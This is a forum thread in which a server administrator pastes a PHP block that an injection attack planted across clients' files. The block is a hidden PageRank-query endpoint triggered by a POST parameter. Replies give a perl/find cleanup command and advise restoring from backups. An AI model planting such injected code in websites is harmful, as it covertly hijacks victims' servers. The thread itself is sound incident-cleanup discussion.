LinuxQuestions.org
Download your favorite Linux distribution at LQ ISO.
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Server
User Name
Password
Linux - Server This forum is for the discussion of Linux Software used in a server related context.

Notices


Reply
  Search this Thread
Old 05-13-2011, 01:58 PM   #1
vandigroup
LQ Newbie
 
Registered: May 2011
Location: San Diego
Posts: 1

Rep: Reputation: 0
Need to remove dynamic string across multiple lines and files.


I know there have been numerous posts on this but I cannot seems to figure out a solution for my dilemma.

My server was hit with an injection script which has placed code across many of my clients files. I need a script that can remove a block of php code that spans multiple lines, multiple directories/files and is dynamic, meaning that part of the code changes. I think using find/sed is what I need but cannot seem to figure out how to get it to work.

The following is the script that is being injected everywhere. The catch is that they have generated dynamic code at the start/end of the script. (I have commented the parts that are dynamically changing on EVERY instance).

PLEASE NOTE: Directly following this script is the start of a valid php script that I do not want to delete.

<?php
//{{65281980 - DYNAMIC!!

GLOBAL $alreadyxxx;
if($alreadyxxx != 1)
{
$alreadyxxx = 1;
$olderrxxx=error_reporting(0);
function StrToNum($Str, $Check, $Magic)
{
$Int32Unit = 4294967296;
$length = strlen($Str);
for ($i = 0; $i < $length; $i++) {
$Check *= $Magic;
if ($Check >= $Int32Unit) {
$Check = ($Check - $Int32Unit * (int) ($Check / $Int32Unit));
$Check = ($Check < -2147483648) ? ($Check + $Int32Unit) : $Check;
}
$Check += ord($Str{$i});
}
return $Check;
}
function HashURL($String)
{
$Check1 = StrToNum($String, 0x1505, 0x21);
$Check2 = StrToNum($String, 0, 0x1003F);

$Check1 >>= 2;
$Check1 = (($Check1 >> 4) & 0x3FFFFC0 ) | ($Check1 & 0x3F);
$Check1 = (($Check1 >> 4) & 0x3FFC00 ) | ($Check1 & 0x3FF);
$Check1 = (($Check1 >> 4) & 0x3C000 ) | ($Check1 & 0x3FFF);

$T1 = (((($Check1 & 0x3C0) << 4) | ($Check1 & 0x3C)) <<2 ) | ($Check2 & 0xF0F );
$T2 = (((($Check1 & 0xFFFFC000) << 4) | ($Check1 & 0x3C00)) << 0xA) | ($Check2 & 0xF0F0000 );

return ($T1 | $T2);
}

function CheckHash($Hashnum)
{
$CheckByte = 0;
$Flag = 0;

$HashStr = sprintf('%u', $Hashnum) ;
$length = strlen($HashStr);

for ($i = $length-1; $i >= 0; $i--) {
$Re = $HashStr{$i};
if (1 === ($Flag % 2)) {
$Re += $Re;
$Re = (int)($Re / 10) + ($Re % 10);
}
$CheckByte += $Re;
$Flag ++;
}

$CheckByte %= 10;
if (0 !== $CheckByte) {
$CheckByte = 10 - $CheckByte;
if (1 === ($Flag % 2) ) {
if (1 === ($CheckByte % 2)) {
$CheckByte += 9;
}
$CheckByte >>= 1;
}
}

return '7'.$CheckByte.$HashStr;
}

function getpr($url)
{
$ch = CheckHash(HashURL($url));
$file = "http://toolbarqueries.google.com/search?client=navclient-auto&ch=$ch&features=Rank&q=info:$url";;
$data = file_get_contents($file);
$pos = strpos($data, "Rank_");
if($pos === false){return -1;} else{
$pr=substr($data, $pos + 9);
$pr=trim($pr);
$pr=str_replace("
",'',$pr);
return $pr;
}
}
if(isset($_POST['xxxprch']))
{
echo getpr($_POST['xxxprch']);
exit();
}
error_reporting($olderrxxx);
}

//}}459611f4 - DYNAMIC CODE!!
?>

-- START OF VALID CODE - DO NOT DELETE BELOW THIS LINE--

<?php
/**
* @version

Thank you immensely for anyone who can help with this pressing issue. Joe
 
Old 05-14-2011, 12:34 AM   #2
neonsignal
Senior Member
 
Registered: Jan 2005
Location: Melbourne, Australia
Distribution: Debian Buster (Fluxbox WM)
Posts: 1,389
Blog Entries: 52

Rep: Reputation: 359Reputation: 359Reputation: 359Reputation: 359
You can strip out multiline matches using various tools including perl, eg:
Code:
perl -p0777i -e 's/<\?php.*?toolbarqueries.*?\?>//gs' test.html
The '-p0777' turns off the separator so that the whole file will be slurped in. The search and replace looks for the start and end of the php script in the file, using *? so that it minimally matches, otherwise it will match across multiple php scripts. And the 's' on the regular expression is so that the '.' matches will include newline characters. I have used the string 'toolbarqueries' as a signature to try to match only the offending scripts, but it might need to be more specific, as a false match would be bad.

You can then use find to do this across multiple files, eg:
Code:
find . -name \*.html -exec perl -p0777i -e 's/<\?php.*?toolbarqueries.*?\?>//gs' {} \;
Test the command on some sample files before unleashing it on the whole system, there is no undo! It would of course be safer to just restore the damaged files from backups if this is an option.

Last edited by neonsignal; 05-14-2011 at 12:42 AM.
 
Old 05-15-2011, 12:50 AM   #3
lodragan
LQ Newbie
 
Registered: Jan 2006
Location: USA
Distribution: Slackware 13.1, Windows 7 (on game box only), Mac OSX
Posts: 18

Rep: Reputation: 4
I'm assuming that crackers are modifying your files, and you want to fix the files? Here is how you do it:

1. Disconnect your servers from the internet.

2. Restore all your servers from backups.

3. Fix injection error/bug.

4. Connect servers back to the internet.
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off



Similar Threads
Thread Thread Starter Forum Replies Last Post
Bash script to find and remove similar lines from multiple files linuxquestion1 Programming 9 07-13-2011 02:45 AM
[SOLVED] string editing: how to remove lines consisting of a single character? recomboDNA Programming 2 07-16-2010 09:55 AM
[SOLVED] Using sed to remove lines around a specified string twchambers Linux - General 1 06-04-2010 12:19 PM
Remove files that contain a specific string poymode Linux - General 5 02-17-2010 04:01 AM
search for a string spread in multiple lines finder255 Linux - Software 2 10-22-2008 04:16 PM

LinuxQuestions.org > Forums > Linux Forums > Linux - Server

All times are GMT -5. The time now is 11:05 AM.

Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
Facebook: linuxquestions Google+: linuxquestions
Open Source Consulting | Domain Registration